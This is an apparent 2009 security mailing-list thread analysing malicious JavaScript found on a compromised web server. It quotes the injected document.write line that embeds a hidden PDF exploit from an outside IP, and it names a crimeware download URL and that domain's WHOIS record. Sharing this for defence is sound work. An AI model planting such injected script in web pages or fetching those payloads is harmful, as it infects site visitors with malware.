Re: Malicious code just found on web server 13E-7EB

[Jake Mailinglists <jbabbinlists () gmail com>]

On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists
<jbabbinlists () gmail com>wrote:

> Paul,
> I noticed that in the PDF file but as the domain doesn't seem to have
> resolution I didn't mention it.
>
> Jake
>
> WHOIS information on the domain
>
> Whois Record
>
> domain:     TEST1.RU
> type:       CORPORATE
> nserver:    ns1.centerhost.ru.
> nserver:    ns1.cetis.ru.
> state:      REGISTERED, DELEGATED
> org:        Center of Effective Technologies and Systems CETIS
> phone:      +7 4957711654
> fax-no:     +7 4957879251
> e-mail:     <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
> e-mail:     <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
> registrar:  REGRU-REG-RIPN
> created:    2001.03.30
> paid-till:  2010.04.03
> source:     TC-RIPN
>
> Registry Data  Created: 2001-03-30  Expires: 2010-04-03  Whois Server:
> whois.ripn.net
>  Server Data Domain Status:  Registered And No Website
>
>
> On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgster () gmail com>wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >  On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate () gmail com>
> > wrote:
> >
> >
> > > > I took a quick look at the code... formatted it in a pastebin here:
> > > > http://pastebin.com/m7b50be54
> > > >
> > > > That javascript writes this to the page (URL obscured):
> > > > document.write("<embed
> > > > src=\"hXXp://
> > 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C>
> > > > U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> > > > type=\"application/pdf\"></embed>");
> > > >
> > > > The 1.2.3.4 in the URL is my public IP address (I changed that).
> > > >
> > > > Below the javascript, it grabs a PDF:
> > > > <embed src="include/two.pdf" width="1" height="0"
> > > > style="border:none"></embed>
> > > >
> > > > That PDF is on the site, I haven't looked at it yet though.
> >
> > Not only is that .pdf malicious, when "executed" it also fetches
> > additional
> > malware from:
> >
> > hxxp:// test1.ru /1.1.1/load.php
> >
> > If that host is not in your block list, it should be -- known purveyor of
> > crimeware.
> >
> > This is in addition to the other malicious URLs mentioned in this thread.
> >
> > - - ferg
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP Desktop 9.5.3 (Build 5003)
> >
> > wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
> > mxM8Ci/feKnJe6M6qbiESPw=
> > =b0Yj
> > -----END PGP SIGNATURE-----
> >
> >
> >
> > --
> > "Fergie", a.k.a. Paul Ferguson
> >  Engineering Architecture for the Internet
> >  fergdawgster(at)gmail.com
> >  ferg's tech blog: http://fergdawg.blogspot.com/